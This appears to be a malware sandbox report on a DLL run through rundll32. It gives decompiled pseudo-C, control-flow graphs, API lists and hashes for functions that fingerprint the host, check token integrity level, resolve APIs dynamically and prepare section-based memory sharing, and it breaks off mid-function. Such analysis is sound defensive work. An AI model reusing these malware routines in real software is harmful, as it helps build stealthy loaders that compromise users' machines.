                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                          • String ID:
                                          • API String ID: 3521023985-0
                                          • Opcode ID: eadad40549fe4900ff8fdc370c694ca8502e082cc15e2a600f3779122e948a09
                                          • Instruction ID: c0e715ad8675bb5f7e613dcce0c82090f79f79699ef5ecb0ec1acdd262a4b170
                                          • Opcode Fuzzy Hash: eadad40549fe4900ff8fdc370c694ca8502e082cc15e2a600f3779122e948a09
                                          • Instruction Fuzzy Hash: FF518DB1018314AFD750BF159E44DABBBE8EF95764F008A2DF8E4A2190D775E904CFA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 163 5110fc-511153 GetSystemTimeAsFileTime _aulldiv _snwprintf 164 511155 163->164 165 51115a-511173 CreateFileMappingW 163->165 164->165 166 511175-51117e 165->166 167 5111bd-5111c3 GetLastError 165->167 169 511180-511187 GetLastError 166->169 170 51118e-51119c MapViewOfFile 166->170 168 5111c5-5111cb 167->168 169->170 171 511189-51118c 169->171 172 5111ac-5111b2 GetLastError 170->172 173 51119e-5111aa 170->173 174 5111b4-5111bb CloseHandle 171->174 172->168 172->174 173->168 174->168
                                          C-Code - Quality: 69%
                                          			E005110FC(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                          				intOrPtr _v12;
                                          				struct _FILETIME* _v16;
                                          				short _v60;
                                          				struct _FILETIME* _t14;
                                          				intOrPtr _t15;
                                          				long _t18;
                                          				void* _t19;
                                          				void* _t22;
                                          				intOrPtr _t31;
                                          				long _t32;
                                          				void* _t34;
                                          
                                          				_t31 = __edx;
                                          				_t14 =  &_v16;
                                          				GetSystemTimeAsFileTime(_t14);
                                          				_push(0x192);
                                          				_push(0x54d38000);
                                          				_push(_v12);
                                          				_push(_v16);
                                          				L00512180();
                                          				_push(_t14);
                                          				_v16 = _t14;
                                          				_t15 =  *0x514144;
                                          				_push(_t15 + 0x51505e);
                                          				_push(_t15 + 0x515054);
                                          				_push(0x16);
                                          				_push( &_v60);
                                          				_v12 = _t31;
                                          				L0051217A();
                                          				_t18 = _a4;
                                          				if(_t18 == 0) {
                                          					_t18 = 0x1000;
                                          				}
                                          				_t19 = CreateFileMappingW(0xffffffff, 0x514148, 4, 0, _t18,  &_v60); // executed
                                          				_t34 = _t19;
                                          				if(_t34 == 0) {
                                          					_t32 = GetLastError();
                                          				} else {
                                          					if(_a4 != 0 || GetLastError() == 0xb7) {
                                          						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                          						if(_t22 == 0) {
                                          							_t32 = GetLastError();
                                          							if(_t32 != 0) {
                                          								goto L9;
                                          							}
                                          						} else {
                                          							 *_a8 = _t34;
                                          							 *_a12 = _t22;
                                          							_t32 = 0;
                                          						}
                                          					} else {
                                          						_t32 = 2;
                                          						L9:
                                          						CloseHandle(_t34);
                                          					}
                                          				}
                                          				return _t32;
                                          			}

                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00511109
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0051111F
                                          • _snwprintf.NTDLL ref: 00511144
                                          • CreateFileMappingW.KERNELBASE(000000FF,00514148,00000004,00000000,?,?), ref: 00511169
                                          • GetLastError.KERNEL32 ref: 00511180
                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00511194
                                          • GetLastError.KERNEL32 ref: 005111AC
                                          • CloseHandle.KERNEL32(00000000), ref: 005111B5
                                          • GetLastError.KERNEL32 ref: 005111BD
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1724014008-0
                                          • Opcode ID: 92a6df73caffb72c2713b7569e777e9f8537e17f06a147928543c33355907c0f
                                          • Instruction ID: 8f71f3a580df713a3652140d9dad90bcfbd85fd15ab4aed14737e070e40b0a40
                                          • Opcode Fuzzy Hash: 92a6df73caffb72c2713b7569e777e9f8537e17f06a147928543c33355907c0f
                                          • Instruction Fuzzy Hash: FC21A4B2680508BFE710AF94DC88EDD7BA8FB98350F118165F715D7150D6305E85DB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E04081A4E(intOrPtr __edx, void** _a4, void** _a8) {
                                          				intOrPtr _v8;
                                          				struct _FILETIME* _v12;
                                          				short _v56;
                                          				struct _FILETIME* _t12;
                                          				intOrPtr _t13;
                                          				void* _t17;
                                          				void* _t21;
                                          				intOrPtr _t27;
                                          				long _t28;
                                          				void* _t30;
                                          
                                          				_t27 = __edx;
                                          				_t12 =  &_v12;
                                          				GetSystemTimeAsFileTime(_t12);
                                          				_push(0x192);
                                          				_push(0x54d38000);
                                          				_push(_v8);
                                          				_push(_v12);
                                          				L0408B082();
                                          				_push(_t12);
                                          				_v12 = _t12;
                                          				_t13 =  *0x408d2a4; // 0xbfa5a8
                                          				_t5 = _t13 + 0x408e836; // 0x4c88dde
                                          				_t6 = _t13 + 0x408e59c; // 0x530025
                                          				_push(0x16);
                                          				_push( &_v56);
                                          				_v8 = _t27;
                                          				L0408AD1A();
                                          				_t17 = CreateFileMappingW(0xffffffff, 0x408d2a8, 4, 0, 0x1000,  &_v56); // executed
                                          				_t30 = _t17;
                                          				if(_t30 == 0) {
                                          					_t28 = GetLastError();
                                          				} else {
                                          					if(GetLastError() == 0xb7) {
                                          						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                          						if(_t21 == 0) {
                                          							_t28 = GetLastError();
                                          							if(_t28 != 0) {
                                          								goto L6;
                                          							}
                                          						} else {
                                          							 *_a4 = _t30;
                                          							 *_a8 = _t21;
                                          							_t28 = 0;
                                          						}
                                          					} else {
                                          						_t28 = 2;
                                          						L6:
                                          						CloseHandle(_t30);
                                          					}
                                          				}
                                          				return _t28;
                                          			}

                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,04084996,?,?,4D283A53,?,?), ref: 04081A5A
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04081A70
                                          • _snwprintf.NTDLL ref: 04081A95
                                          • CreateFileMappingW.KERNELBASE(000000FF,0408D2A8,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 04081AB1
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04084996,?,?,4D283A53,?), ref: 04081AC3
                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 04081ADA
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,04084996,?,?,4D283A53), ref: 04081AFB
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04084996,?,?,4D283A53,?), ref: 04081B03
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1814172918-0
                                          • Opcode ID: 554a63343d8930f96b0bd613da3970681308da165e3a8f01551c6c9bdec4e84a
                                          • Instruction ID: 3c72f20ee6ef52a7035a9468fffdc82328d4b7a16e9e0d7bbfebc61ea20536a6
                                          • Opcode Fuzzy Hash: 554a63343d8930f96b0bd613da3970681308da165e3a8f01551c6c9bdec4e84a
                                          • Instruction Fuzzy Hash: 67219F76600204BBE721EF68DE45F8E77B9EF84751F144129F685FA180EA78E9068F60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 184 40893d5-40893e9 185 40893eb-40893f0 184->185 186 40893f3-4089405 call 4086f89 184->186 185->186 189 4089459-4089466 186->189 190 4089407-4089417 GetUserNameW 186->190 191 4089468-408947f GetComputerNameW 189->191 190->191 192 4089419-4089429 RtlAllocateHeap 190->192 193 40894bd-40894e1 191->193 194 4089481-4089492 RtlAllocateHeap 191->194 192->191 195 408942b-4089438 GetUserNameW 192->195 194->193 198 4089494-408949d GetComputerNameW 194->198 196 4089448-4089457 HeapFree 195->196 197 408943a-4089446 call 4087cf7 195->197 196->191 197->196 200 40894ae-40894b7 HeapFree 198->200 201 408949f-40894ab call 4087cf7 198->201 200->193 201->200
                                          C-Code - Quality: 96%
                                          			E040893D5(char __eax, void* __esi) {
                                          				long _v8;
                                          				char _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v28;
                                          				long _t34;
                                          				signed int _t39;
                                          				long _t50;
                                          				char _t59;
                                          				intOrPtr _t61;
                                          				void* _t62;
                                          				void* _t64;
                                          				char _t65;
                                          				intOrPtr* _t67;
                                          				void* _t68;
                                          				void* _t69;
                                          
                                          				_t69 = __esi;
                                          				_t65 = __eax;
                                          				_v8 = 0;
                                          				_v12 = __eax;
                                          				if(__eax == 0) {
                                          					_t59 =  *0x408d270; // 0xd448b889
                                          					_v12 = _t59;
                                          				}
                                          				_t64 = _t69;
                                          				E04086F89( &_v12, _t64);
                                          				if(_t65 != 0) {
                                          					 *_t69 =  *_t69 ^  *0x408d2a0 ^ 0x76f6612d;
                                          				} else {
                                          					GetUserNameW(0,  &_v8); // executed
                                          					_t50 = _v8;
                                          					if(_t50 != 0) {
                                          						_t62 = RtlAllocateHeap( *0x408d238, 0, _t50 + _t50);
                                          						if(_t62 != 0) {
                                          							if(GetUserNameW(_t62,  &_v8) != 0) {
                                          								_t64 = _t62;
                                          								 *_t69 =  *_t69 ^ E04087CF7(_v8 + _v8, _t64);
                                          							}
                                          							HeapFree( *0x408d238, 0, _t62);
                                          						}
                                          					}
                                          				}
                                          				_t61 = __imp__;
                                          				_v8 = _v8 & 0x00000000;
                                          				GetComputerNameW(0,  &_v8);
                                          				_t34 = _v8;
                                          				if(_t34 != 0) {
                                          					_t68 = RtlAllocateHeap( *0x408d238, 0, _t34 + _t34);
                                          					if(_t68 != 0) {
                                          						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                          							_t64 = _t68;
                                          							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04087CF7(_v8 + _v8, _t64);
                                          						}
                                          						HeapFree( *0x408d238, 0, _t68);
                                          					}
                                          				}
                                          				asm("cpuid");
                                          				_t67 =  &_v28;
                                          				 *_t67 = 1;
                                          				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                          				 *((intOrPtr*)(_t67 + 8)) = 0;
                                          				 *(_t67 + 0xc) = _t64;
                                          				_t39 = _v16 ^ _v20 ^ _v28;
                                          				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                          				return _t39;
                                          			}

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0408940C
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04089423
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04089430
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04089451
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04089478
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0408948C
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04089499
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 040894B7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: HeapName$AllocateComputerFreeUser
                                          • String ID:
                                          • API String ID: 3239747167-0
                                          • Opcode ID: 810a0b6c8d77b8f567ad1740b76a87e8799fafd96706a1c9cb4d8b73aa79f84e
                                          • Instruction ID: 8119bb95c05086bed8a3b4da04675305718925a2b268a655b14bfd77c74b0fde
                                          • Opcode Fuzzy Hash: 810a0b6c8d77b8f567ad1740b76a87e8799fafd96706a1c9cb4d8b73aa79f84e
                                          • Instruction Fuzzy Hash: CF311AB1A00205EFEB10EFA9DA80AAEB7F9EF54314F51457DE585E7250D738EE019B10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 100%
                                          			E040853E3(long* _a4) {
                                          				long _v8;
                                          				void* _v12;
                                          				void _v16;
                                          				long _v20;
                                          				int _t33;
                                          				void* _t46;
                                          
                                          				_v16 = 1;
                                          				_v20 = 0x2000;
                                          				if( *0x408d25c > 5) {
                                          					_v16 = 0;
                                          					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                          						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                          						_v8 = 0;
                                          						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                          						if(_v8 != 0) {
                                          							_t46 = E040858BE(_v8);
                                          							if(_t46 != 0) {
                                          								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                          								if(_t33 != 0) {
                                          									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                          								}
                                          								E0408147E(_t46);
                                          							}
                                          						}
                                          						CloseHandle(_v12);
                                          					}
                                          				}
                                          				 *_a4 = _v20;
                                          				return _v16;
                                          			}

                                          APIs
                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04085415
                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04085435
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04085445
                                          • CloseHandle.KERNEL32(00000000), ref: 04085495
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04085468
                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04085470
                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04085480
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                          • String ID:
                                          • API String ID: 1295030180-0
                                          • Opcode ID: 8f1a4135bb9223dc3afa548d582af470cd9058cfde26b841c7c09d38070d31c1
                                          • Instruction ID: c22990cf90c9db7f32da49b97ea12a28452a1e8d443148d7401bcc0f29575df5
                                          • Opcode Fuzzy Hash: 8f1a4135bb9223dc3afa548d582af470cd9058cfde26b841c7c09d38070d31c1
                                          • Instruction Fuzzy Hash: DE211975900218FFEB00AFA4DD44EAEBBB9EF44314F1041AAE550B62A1C7759A05EF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 231 511954-511968 232 51196a-51196b 231->232 233 5119dd-5119ea InterlockedDecrement 231->233 234 511971-51197e InterlockedIncrement 232->234 235 511a2a-511a31 232->235 233->235 236 5119ec-5119f2 233->236 234->235 237 511984-511998 HeapCreate 234->237 238 5119f4 236->238 239 511a1e-511a24 HeapDestroy 236->239 240 5119d8-5119db 237->240 241 51199a-5119cf call 51105a CreateThread 237->241 242 5119f9-511a09 SleepEx 238->242 239->235 240->235 241->235 247 5119d1-5119d4 241->247 244 511a12-511a18 CloseHandle 242->244 245 511a0b-511a10 242->245 244->239 245->242 245->244 247->240
                                          C-Code - Quality: 89%
                                          			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
                                          				struct _SECURITY_ATTRIBUTES* _v8;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				long _t9;
                                          				void* _t10;
                                          				void* _t18;
                                          				void* _t23;
                                          				void* _t36;
                                          
                                          				_push(__ecx);
                                          				_t9 = _a8;
                                          				_v8 = 1;
                                          				if(_t9 == 0) {
                                          					_t10 = InterlockedDecrement(0x514108);
                                          					__eflags = _t10;
                                          					if(_t10 == 0) {
                                          						__eflags =  *0x51410c;
                                          						if( *0x51410c != 0) {
                                          							_t36 = 0x2710;
                                          							while(1) {
                                          								SleepEx(0x64, 1);
                                          								__eflags =  *0x514118;
                                          								if( *0x514118 == 0) {
                                          									break;
                                          								}
                                          								_t36 = _t36 - 0x64;
                                          								__eflags = _t36;
                                          								if(_t36 > 0) {
                                          									continue;
                                          								}
                                          								break;
                                          							}
                                          							CloseHandle( *0x51410c);
                                          						}
                                          						HeapDestroy( *0x514110);
                                          					}
                                          				} else {
                                          					if(_t9 == 1 && InterlockedIncrement(0x514108) == 1) {
                                          						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                          						 *0x514110 = _t18;
                                          						_t41 = _t18;
                                          						if(_t18 == 0) {
                                          							L6:
                                          							_v8 = 0;
                                          						} else {
                                          							 *0x514130 = _a4;
                                          							asm("lock xadd [eax], ebx");
                                          							_t23 = CreateThread(0, 0, E0051103B, E0051105A(_a12, 0, 0x514118, _t41), 0,  &_a8); // executed
                                          							 *0x51410c = _t23;
                                          							if(_t23 == 0) {
                                          								asm("lock xadd [esi], eax");
                                          								goto L6;
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v8;
                                          			}













                                          APIs
                                          • InterlockedIncrement.KERNEL32(00514108), ref: 00511976
                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0051198B
                                          • CreateThread.KERNEL32 ref: 005119C2
                                          • InterlockedDecrement.KERNEL32(00514108), ref: 005119E2
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 005119FC
                                          • CloseHandle.KERNEL32 ref: 00511A18
                                          • HeapDestroy.KERNEL32 ref: 00511A24
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
                                          • String ID:
                                          • API String ID: 3416589138-0
                                          • Opcode ID: 7fce8f01c9cc715cc7439deb8c1803bdbbefbbdb8c28b9c0ca3669d382fd85d1
                                          • Instruction ID: 959d51633458e152970427beafbd5b32c57b90759db2fc7b6a5502db1a8688a4
                                          • Opcode Fuzzy Hash: 7fce8f01c9cc715cc7439deb8c1803bdbbefbbdb8c28b9c0ca3669d382fd85d1
                                          • Instruction Fuzzy Hash: 2621AC31A40605AFE710DF68AC989E97FA8FBB9750B108069FA01E3150E3308EC4EF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 248 408a060-408a0a6 SysAllocString 249 408a1ca-408a1ce 248->249 250 408a0ac-408a0d9 248->250 251 408a1d9-408a1dd 249->251 252 408a1d0-408a1d3 SafeArrayDestroy 249->252 256 408a1c8 250->256 257 408a0df-408a0eb call 408a872 250->257 254 408a1e8-408a1ee 251->254 255 408a1df-408a1e2 SysFreeString 251->255 252->251 255->254 256->249 257->256 260 408a0f1-408a101 257->260 260->256 262 408a107-408a12d IUnknown_QueryInterface_Proxy 260->262 262->256 264 408a133-408a147 262->264 266 408a149-408a14d 264->266 267 408a186-408a18b 264->267 266->267 268 408a14f-408a166 StrStrIW 266->268 269 408a18d-408a192 267->269 270 408a1bf-408a1c4 267->270 271 408a168-408a171 call 40891b5 268->271 272 408a17d-408a180 SysFreeString 268->272 269->270 273 408a194-408a19f call 4081295 269->273 270->256 271->272 279 408a173-408a17b call 408a872 271->279 272->267 276 408a1a4-408a1a8 273->276 276->270 278 408a1aa-408a1af 276->278 280 408a1ba 278->280 281 408a1b1-408a1b8 278->281 279->272 280->270 281->270
                                          APIs
                                          • SysAllocString.OLEAUT32(?), ref: 0408A09B
                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 0408A11E
                                          • StrStrIW.SHLWAPI(00000000,006E0069), ref: 0408A15E
                                          • SysFreeString.OLEAUT32(00000000), ref: 0408A180
                                            • Part of subcall function 040891B5: SysAllocString.OLEAUT32(0408C298), ref: 04089205
                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 0408A1D3
                                          • SysFreeString.OLEAUT32(00000000), ref: 0408A1E2
                                            • Part of subcall function 0408A872: Sleep.KERNEL32(000001F4), ref: 0408A8BA
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                          • String ID:
                                          • API String ID: 2118684380-0
                                          • Opcode ID: 299e2786bdb6cc7558a1672d840f061af8500fe638839c4e06fcba6ad5daf9ed
                                          • Instruction ID: 26a886b18b0338e070db04b912c62d5d267b049095044642e14eda58dd45fb23
                                          • Opcode Fuzzy Hash: 299e2786bdb6cc7558a1672d840f061af8500fe638839c4e06fcba6ad5daf9ed
                                          • Instruction Fuzzy Hash: 1A514C35600609AFDB01EFA8D944ADAB7B6EFC8754B14882DE585EB210EB34ED05CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 284 511f61-511f74 call 511026 287 512036 284->287 288 511f7a-511faf GetModuleHandleA GetProcAddress 284->288 289 51203d-512044 287->289 290 511fb1-511fc5 GetProcAddress 288->290 291 51202e-512034 call 511938 288->291 290->291 292 511fc7-511fdb GetProcAddress 290->292 291->289 292->291 294 511fdd-511ff1 GetProcAddress 292->294 294->291 296 511ff3-512007 GetProcAddress 294->296 296->291 297 512009-51201b call 511a34 296->297 299 512020-512025 297->299 299->291 300 512027-51202c 299->300 300->289
                                          C-Code - Quality: 100%
                                          			E00511F61(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                          				intOrPtr _v8;
                                          				_Unknown_base(*)()* _t28;
                                          				_Unknown_base(*)()* _t32;
                                          				_Unknown_base(*)()* _t35;
                                          				_Unknown_base(*)()* _t38;
                                          				_Unknown_base(*)()* _t41;
                                          				intOrPtr _t44;
                                          				struct HINSTANCE__* _t48;
                                          				intOrPtr _t54;
                                          
                                          				_t54 = E00511026(0x20);
                                          				if(_t54 == 0) {
                                          					_v8 = 8;
                                          				} else {
                                          					_t48 = GetModuleHandleA( *0x514144 + 0x515014);
                                          					_v8 = 0x7f;
                                          					_t28 = GetProcAddress(_t48,  *0x514144 + 0x51514c);
                                          					 *(_t54 + 0xc) = _t28;
                                          					if(_t28 == 0) {
                                          						L8:
                                          						E00511938(_t54);
                                          					} else {
                                          						_t32 = GetProcAddress(_t48,  *0x514144 + 0x51515c);
                                          						 *(_t54 + 0x10) = _t32;
                                          						if(_t32 == 0) {
                                          							goto L8;
                                          						} else {
                                          							_t35 = GetProcAddress(_t48,  *0x514144 + 0x51516f);
                                          							 *(_t54 + 0x14) = _t35;
                                          							if(_t35 == 0) {
                                          								goto L8;
                                          							} else {
                                          								_t38 = GetProcAddress(_t48,  *0x514144 + 0x515184);
                                          								 *(_t54 + 0x18) = _t38;
                                          								if(_t38 == 0) {
                                          									goto L8;
                                          								} else {
                                          									_t41 = GetProcAddress(_t48,  *0x514144 + 0x51519a);
                                          									 *(_t54 + 0x1c) = _t41;
                                          									if(_t41 == 0) {
                                          										goto L8;
                                          									} else {
                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                          										_t44 = E00511A34(_t54, _a8); // executed
                                          										_v8 = _t44;
                                          										if(_t44 != 0) {
                                          											goto L8;
                                          										} else {
                                          											 *_a12 = _t54;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v8;
                                          			}













                                          APIs
                                            • Part of subcall function 00511026: HeapAlloc.KERNEL32(00000000,?,00511329,00000208,?,-00000008,?,?,?,0051122F,?), ref: 00511032
                                          • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,00511B06,?,?,?,?,00000002,?,0051178F), ref: 00511F86
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00511FA8
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00511FBE
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00511FD4
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00511FEA
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00512000
                                            • Part of subcall function 00511A34: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 00511A91
                                            • Part of subcall function 00511A34: memset.NTDLL ref: 00511AB3
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                          • String ID:
                                          • API String ID: 1632424568-0
                                          • Opcode ID: b329a1aacb1b3b5c127086740503305ae64dea1a8c47c3fc8e27545f413d1bc4
                                          • Instruction ID: 17e027be8a8572250a81cb15d365548d9f2f0781757c97feff8c514f586680d8
                                          • Opcode Fuzzy Hash: b329a1aacb1b3b5c127086740503305ae64dea1a8c47c3fc8e27545f413d1bc4
                                          • Instruction Fuzzy Hash: 4B213CB0640606AFE721DF69DD88EEABBECBB58300B055566E505D7211E770ED44CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 301 4087c75-4087c88 302 4087c8f-4087c93 StrChrA 301->302 303 4087c8a-4087c8e 302->303 304 4087c95-4087ca6 call 40858be 302->304 303->302 307 4087ca8-4087cb4 StrTrimA 304->307 308 4087ceb 304->308 310 4087cb6-4087cbf StrChrA 307->310 309 4087ced-4087cf4 308->309 311 4087cd1-4087cdd 310->311 312 4087cc1-4087ccb StrTrimA 310->312 311->310 313 4087cdf-4087ce9 311->313 312->311 313->309
                                          C-Code - Quality: 54%
                                          			E04087C75(char* __eax) {
                                          				char* _t8;
                                          				intOrPtr _t12;
                                          				char* _t21;
                                          				signed int _t23;
                                          				char* _t24;
                                          				signed int _t26;
                                          				void* _t27;
                                          
                                          				_t21 = __eax;
                                          				_push(0x20);
                                          				_t23 = 1;
                                          				_push(__eax);
                                          				while(1) {
                                          					_t8 = StrChrA();
